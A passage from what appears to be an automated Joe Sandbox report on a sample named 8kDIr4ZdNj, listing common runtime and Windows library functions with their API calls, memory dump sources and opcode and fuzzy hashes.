                                                                        • Instruction Fuzzy Hash: 2BF0813150431DA6CB20AB98EC059DF77ACFF01351F540569F904E6381DF709A80CA96
                                                                        Function 008B55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file_memset
                                                                        • String ID:
                                                                        • API String ID: 26237723-0
                                                                        • Opcode ID: 339294a327941b7572b27457c9b7ee7bef315876c0abc0f50fd3a0adc70034c0
                                                                        • Instruction ID: 7a047bcc68e8f2a1e2b4765bc19034f8e3cd7ae421d630836a096cb19d240ce2
                                                                        • Opcode Fuzzy Hash: 339294a327941b7572b27457c9b7ee7bef315876c0abc0f50fd3a0adc70034c0
                                                                        • Instruction Fuzzy Hash: 4E018471800A09EBCF22AF6CDC029DE7F61FFA2361F544115B8249A391DB318A51DF92
                                                                        Function 008B53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • __lock_file.LIBCMT ref: 008B53EB
                                                                          • Part of subcall function 008B6C11: __lock.LIBCMT ref: 008B6C34
                                                                        • __fclose_nolock.LIBCMT ref: 008B53F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: a244340138463b73bc47f666eb0930f12c077c7c0c94fbac7aea9f272e048e86
                                                                        • Instruction ID: ef30a50ca257d29a553c4a64ba9fd8ca49350761871bca2cb99e8bd15e3458de
                                                                        • Opcode Fuzzy Hash: a244340138463b73bc47f666eb0930f12c077c7c0c94fbac7aea9f272e048e86
                                                                        • Instruction Fuzzy Hash: 16F09671800A04DADB206F7998017EE6BE4FF46374F248109A424EB3C1CBBC89419B53
                                                                        Function 00898061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0089542F,?,?,?,?,?), ref: 0089807A
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0089542F,?,?,?,?,?), ref: 008980AD
                                                                          • Part of subcall function 0089774D: _memmove.LIBCMT ref: 00897789
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                        • String ID:
                                                                        • API String ID: 3033907384-0
                                                                        • Opcode ID: 5095749d9e43c0b9ac3b3053aa4163047c5d7e5e5d6f92fb0a13978c1da92a6b
                                                                        • Instruction ID: e83859d30835d16b82251047c0d97af09a3fb8012e06fbd2618e2be964ee4227
                                                                        • Opcode Fuzzy Hash: 5095749d9e43c0b9ac3b3053aa4163047c5d7e5e5d6f92fb0a13978c1da92a6b
                                                                        • Instruction Fuzzy Hash: C0018B31205608BEEB246A65DC4AEBB3B6DEB86360F14802AF905CE290DA309800D662
                                                                        Function 008A1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3f01fded66ff70b79d4d96082c7ba184dff17f4be09af5d7dd68c9e3e961511
                                                                        • Instruction ID: f55d3f5a6baa30ff9ede7347a92b21abfa3984d3fa9acbddddc47c223d55250f
                                                                        • Opcode Fuzzy Hash: c3f01fded66ff70b79d4d96082c7ba184dff17f4be09af5d7dd68c9e3e961511
                                                                        • Instruction Fuzzy Hash: 68517031600608AFDF15FB6CC991AAE77A6FF46314F184169F906EB392DA34ED00CB52
                                                                        Function 014FFA78 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 014FF2E8: GetFileAttributesW.KERNELBASE(?), ref: 014FF2F3
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 014FFBB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesCreateDirectoryFile
                                                                        • String ID:
                                                                        • API String ID: 3401506121-0
                                                                        • Opcode ID: 240bd36e58aaa862bbd3deca61fb00cf1e3dd82682042b961d369eacd87e4d29
                                                                        • Instruction ID: 48d2a4ab06748b782d8cf5b1885e1c6eef77cc96563008580190993870659112
                                                                        • Opcode Fuzzy Hash: 240bd36e58aaa862bbd3deca61fb00cf1e3dd82682042b961d369eacd87e4d29
                                                                        • Instruction Fuzzy Hash: DC515332A1021997EF14EFA0C854BEF7339EF58700F00456DBA09EB290EB759B49CB65
                                                                        Function 0089750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 466d4fab0e0abc0368e09bf1daada431e7524abf4e3e2937a3207ee13ebb7497
                                                                        • Instruction ID: 9efc992fdf46127fe8ab8ed33b629d0929db22dd81c171853b6bb4b871dc2f70
                                                                        • Opcode Fuzzy Hash: 466d4fab0e0abc0368e09bf1daada431e7524abf4e3e2937a3207ee13ebb7497
                                                                        • Instruction Fuzzy Hash: B531A175218A029FCB14EF1DC081A62F7A0FF49310B19C669E98ACB791E730E841CB85
                                                                        Function 00895AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00895B96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 72af11e80510ec54d6f911d482e1ee1db5750c895a3d581df66b3e210966836b
                                                                        • Instruction ID: eb04ff672fcc494f7713db2bd86ab4204189fb6ff956829ae44cfb033e73eb08
                                                                        • Opcode Fuzzy Hash: 72af11e80510ec54d6f911d482e1ee1db5750c895a3d581df66b3e210966836b
                                                                        • Instruction Fuzzy Hash: 5F313B31A00A09AFCF19EF6CC484AADB7B5FF84324F188629E819D3710D770A990CB91
                                                                        Function 008B0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: b92b121dbafc118dbf47ba9faa50f3365f84e57e9946606bd5fd8c7d3959843a
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: B331B670A0010A9BC718DF58C4A49AAFBA6FB59304B6497A5E80ACB355DB31EDC1DFC0
                                                                        Function 008CFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: ac3b039f3c45df35e524c80b348593b15375d23af0cbfc0c1732239805c44598
                                                                        • Instruction ID: 5ccbb7da6a56d665733e33951321df24be53497505724a204f0cd595a108b4b3
                                                                        • Opcode Fuzzy Hash: ac3b039f3c45df35e524c80b348593b15375d23af0cbfc0c1732239805c44598
                                                                        • Instruction Fuzzy Hash: 3041E4746083419FDB24DF18C458B1ABBE1FF45318F0989ACE99A8B762C735E845CF92
                                                                        Function 008959B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 98f3734a4721e5a3d46ecdda9f8bc0d3df42a9825e6cae6d58c2b976952d8745
                                                                        • Instruction ID: 9aefa0a83f878f8f894f7675896e34a3404bcd9d478a2f35df875660eec5a7cc
                                                                        • Opcode Fuzzy Hash: 98f3734a4721e5a3d46ecdda9f8bc0d3df42a9825e6cae6d58c2b976952d8745
                                                                        • Instruction Fuzzy Hash: 0221F371914B08EBDF10AF55E880BAB7FB8FB01350F25846EE489D6211EB70D4D0D746
                                                                        Function 008CFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 65a14059cc1805ec810ae6b38313e51fbaeb1c219200d605ac568cc90057e9e9
                                                                        • Instruction ID: 173143edb5acf569eeccb17874e034af8a230aabd32fce9c3fc123d11c2a7654
                                                                        • Opcode Fuzzy Hash: 65a14059cc1805ec810ae6b38313e51fbaeb1c219200d605ac568cc90057e9e9
                                                                        • Instruction Fuzzy Hash: B121F374508305DFDB18EF28C444A5ABBE1FF84314F09896CF8899B762D731E805CB92
                                                                        Function 00894DFD Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 00894E0F
                                                                          • Part of subcall function 00894B6A: FreeLibrary.KERNEL32(00000000), ref: 00894BA4
                                                                          • Part of subcall function 00894C70: _memmove.LIBCMT ref: 00894CBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Library$FreeLoad_memmove
                                                                        • String ID:
                                                                        • API String ID: 3093072483-0
                                                                        • Opcode ID: fd10f3eff3984f98c4f44f36f388ff9a3bd24ee3f79ae5321a90f9e7809089b7
                                                                        • Instruction ID: ade3559536f8ecf2ec7b59a5ac94b0093ecba1010494ba88568342d24f7e6fe0
                                                                        • Opcode Fuzzy Hash: fd10f3eff3984f98c4f44f36f388ff9a3bd24ee3f79ae5321a90f9e7809089b7
                                                                        • Instruction Fuzzy Hash: 0E01923160030AAACF10BF748816FAE77A5FB44764F148929F541E7181DA7599029B52
                                                                        Function 00895BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,008956A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00895C16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 2ce2af6c8117fb69e2a7dbec81c81b6ed8c9597d47fd752460f61e9d5b2ac77b
                                                                        • Instruction ID: ea3109709372ffb4389957f33133cf881452ad9f70a9c23fb81b4e7835019fb1
                                                                        • Opcode Fuzzy Hash: 2ce2af6c8117fb69e2a7dbec81c81b6ed8c9597d47fd752460f61e9d5b2ac77b
                                                                        • Instruction Fuzzy Hash: 44113A71204B059FDB22AF19D880B62B7E4FF44764F18C92DE99AC6A51D770E844CB60
                                                                        Function 00895A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 978d1aad5df7812ac713aa9cd607e39b4a84e8956f91d109ff09f8e5e1e292a2
                                                                        • Instruction ID: 4bb6f52c384ac5284f5647002d427324ddfb01b52a067b1e858c802cd363c7dd
                                                                        • Opcode Fuzzy Hash: 978d1aad5df7812ac713aa9cd607e39b4a84e8956f91d109ff09f8e5e1e292a2
                                                                        • Instruction Fuzzy Hash: 9F018FB9200A42AFC705EB2DC451D2AF7A9FF8A3107144569E819C7702DB31FC21CBE1
                                                                        Function 008B072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008B07B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: 174b68c8fece845dcbe28d2026095ad30469e75eea734eacd69a067a8765de9b
                                                                        • Instruction ID: 9a74053a9b0866640a977b164b4dc7f59a6e9be5b16b4b5d6f95c637434f12af
                                                                        • Opcode Fuzzy Hash: 174b68c8fece845dcbe28d2026095ad30469e75eea734eacd69a067a8765de9b
                                                                        • Instruction Fuzzy Hash: 7001A476590604AFC7119F5CE841AE5B3F8FF8EB61B0409EAF884CBA64DA316C45CBC1
                                                                        Function 00894E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?), ref: 00894E7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 3792cb3a5b5055b1ca8732d93fd06841874422de0014061cb538b1c4d918a93e
                                                                        • Instruction ID: 7cbe024d9b114ea739d5ad4958f4ce847a501ebd05241f1004e6bbebc6231cd4
                                                                        • Opcode Fuzzy Hash: 3792cb3a5b5055b1ca8732d93fd06841874422de0014061cb538b1c4d918a93e
                                                                        • Instruction Fuzzy Hash: 9EF0F271505711CFCF34AF64E894C5ABBE1FB143393289A2EE19682620C732A881EB40
                                                                        Function 008B0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008B07B0
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath_memmove
                                                                        • String ID:
                                                                        • API String ID: 2514874351-0
                                                                        • Opcode ID: 71f387cf1bab93ee1dec2380ddca9192a4d38a1740259d7d4e62a5ceb13ffc6d
                                                                        • Instruction ID: 5abe147735d7da3226c06c67aa94798da06d075b710b23db309ea7e5f63dde66
                                                                        • Opcode Fuzzy Hash: 71f387cf1bab93ee1dec2380ddca9192a4d38a1740259d7d4e62a5ceb13ffc6d
                                                                        • Instruction Fuzzy Hash: E9E08636A1422857CB20A65C9C05FEA77ADEB897A0F0841B5FC08D7205D9709C808691
                                                                        Function 008F8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock
                                                                        • String ID:
                                                                        • API String ID: 2638373210-0
                                                                        • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                        • Instruction ID: 881eeb32a5f149094f92ca5e72b6beff0452a691a31bf1a2ae01e517fb888ca5
                                                                        • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                        • Instruction Fuzzy Hash: F2E012B1504B049FDB398A24D851BE377E1FB09315F04095DF6AAD3242EB6278458B59
